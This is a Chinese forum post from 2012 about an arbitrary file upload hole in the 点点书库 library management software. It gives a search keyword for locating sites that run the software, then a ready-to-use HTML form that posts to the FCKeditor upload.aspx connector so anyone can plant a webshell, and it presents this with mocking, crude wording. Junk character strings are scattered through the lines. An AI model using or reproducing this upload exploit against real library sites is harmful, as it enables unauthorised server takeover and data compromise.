主题:图书馆系统任意文件上传漏洞
' F/ l# c$ [ }. L% T% Q 作者:冰锋刺客) z9 @6 \8 h" u5 g( d
厂商:点击书(dianjishu.com)% E6 C' F7 M" L/ f8 n8 [
日期:2012-6-21
- U$ t9 @) S$ N n8 ] @. J( `, i" }$ v8 C8 u
I 概述6 X& q, N2 ^/ b; O7 y! N+ ^& G
点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell( J3 `* R2 g% Z! ]# _, k0 S
II 简介
" ?- ~0 d. w1 E3 f/ @ 关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"
6 x% Z+ H1 R& q9 |! d& X" ` 补充一个漏洞) X* c; x; j/ J: `* M% K& p
<form id="frmUpload" enctype="multipart/form-data"* i% r" ?( _6 f2 D' {
action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>
7 G( ~( k9 C0 }# o5 `0 } <input id="btnUpload" type="submit" value="操翻他">
7 i9 q: C, T3 E/ D' X </form>. o! W5 k6 f5 U4 O, o. T
你们懂的4 \% X/ ^, F i$ I, d2 T5 N0 l8 M! _% s
那傻逼提供还需要改包.' n' `! f0 b3 Z
自己看了下源代码发现fckeditor8 w Y# X v( Q: F
直接秒杀! ^: j5 e9 y1 ]* r: h" u" x0 R7 ~% E
|
发表于 2012-9-10 21:20:59
收藏
支持
反对